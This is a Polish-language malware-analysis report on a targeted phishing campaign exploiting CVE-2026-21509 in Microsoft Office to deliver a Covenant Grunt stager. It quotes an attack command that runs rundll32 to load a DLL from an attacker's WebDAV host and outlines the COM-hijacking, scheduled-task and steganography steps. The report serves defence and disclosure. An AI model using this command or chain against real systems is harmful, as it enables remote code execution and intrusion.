Irondefence Laboratorium Analizy Malware
Powrot do archiwum
ENG PL

Dossier raportu

CVE-2026-21509 | Campaign analysis and COM abuse chain

Polska wersja raportu o wykorzystaniu CVE-2026-21509 do dostarczania ładunku Covenant Grunt.

Publikacja 15.03.2026
ID raportu cve-2026-21509-crafty-leshy
Jezyk Polski
Dostepne English / Polski
TLP CLEAR
Sekcje 5
Tagi
officephishingcovenantcom abuse

CVE-2026-21509

W dniu 26.01.2026 r. firma Microsoft poinformowała o zidentyfikowaniu nowej podatności w produkcie Microsoft Office, oznaczonej identyfikatorem CVE-2026-21509. Analitycy DKWOC, prowadzący bieżące monitorowanie aktywności adwersarzy zidentyfikowali artefakty pozwalające potwierdzić aktywne wykorzystanie luki w kampaniach wymierzonych zarówno w instytucje krajowe, jak i zagraniczne już w dniu 30.01.2026 r. Przeprowadzona analiza wskazuje, iż adwersarz rozpoczął prace nad uzbrojeniem złośliwych dokumentów kolejnego dnia po upublicznieniu podatności.

Pomimo szerokiego zasięgu kampanii, działania adwersarza miały charakter ukierunkowany. Treści wiadomości były spójne z profilem działalności zarówno nadawcy, jak i odbiorcy, co zwiększało wiarygodność korespondencji phishingowej i istotnie utrudniało wykrycie symptomów ataku.

Na czym polega podatność CVE-2026-21509

Podatność wynika z nieprawidłowej walidacji danych wejściowych wykorzystywanych przez Microsoft Office podczas podejmowania decyzji bezpieczeństwa. Została ona sklasyfikowana jako CWE-807: Reliance on Untrusted Inputs in a Security Decision.

W praktyce atakujący może spreparować dokument, który omija proces walidacji Compatibility Flags, skutkując załadowaniem obiektu COM i wykonaniem określonej dla niego akcji. W obserwowanym scenariuszu jedyną wymaganą aktywnością po stronie ofiary było otwarcie złośliwego dokumentu.

Analiza ataku

Pierwszym etapem zaobserwowanego ataku było dostarczenie wiadomości phishingowych do odbiorców. Jak wcześniej wspomniano, adwersarz wykorzystał przejęte skrzynki pocztowe instytucji państwowych, a treści wiadomości były spójne z profilem działalności zarówno nadawcy, jak i odbiorcy.

W przesłanym dokumencie osadzony został obiekt OLE Shell.Explorer.1 (CLSID: EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B), którego inicjalizacja skutkuje pobraniem oraz wykonaniem pliku skrótu .lnk umieszczonego na zdalnym zasobie WebDAV.

W rezultacie system Windows podejmuje próbę otwarcia zasobu znajdującego się w zdalnej lokalizacji WebDAV jako pliku typu .cpl, co prowadzi do wykonania:

rundll32.exe shell32.dll,Control_RunDLL "\\freefoodaid.com@SSL\tables\tables.d"

Mechanizm ten skutkuje załadowaniem złośliwej biblioteki DLL. W dalszej kolejności obserwowano wykorzystanie techniki COM Hijacking oraz utworzenie zaplanowanego zadania systemowego służącego do ponownej inicjalizacji explorer.exe i aktywacji kolejnych etapów infekcji.

Dalsze etapy infekcji

W dalszej fazie działania załadowana biblioteka EhStoreShell.dll odczytuje plik graficzny SplashScreen.png i wydobywa z niego ładunek ukryty techniką steganograficzną LSB. Wydobyty shellcode wykonywany jest bezpośrednio w pamięci operacyjnej.

Przeprowadzona analiza wskazuje, iż jest to implant Grunt (stager) powiązany z frameworkiem C2 Covenant, a jako kanał komunikacji wykorzystuje serwis chmurowy filen[.]io. Zastosowane techniki są spójne z wcześniejszymi kampaniami przypisywanymi temu samemu adwersarzowi.

Zalecenia

DKWOC zaleca wszystkim użytkownikom Microsoft Office niezwłoczne zastosowanie aktualizacji bezpieczeństwa. Dodatkowo rekomendowane jest:

  • zweryfikowanie komunikacji sieciowej pod kątem połączeń z domenami wskazanymi w sekcji IoC,
  • przeszukanie systemów pocztowych z wykorzystaniem reguł YARA,
  • analiza artefaktów persystencji związanych z COM Hijacking i zadaniami zaplanowanymi.

Podsumowanie

Celem niniejszego artykułu jest podkreślenie konieczności niezwłocznego stosowania aktualizacji bezpieczeństwa. Jak pokazuje analizowany przypadek, aktor dysponujący wysokim poziomem zaawansowania jest w stanie w bardzo krótkim czasie od momentu publikacji informacji o podatności wykorzystać ją do prowadzenia skutecznych i ukierunkowanych działań ofensywnych.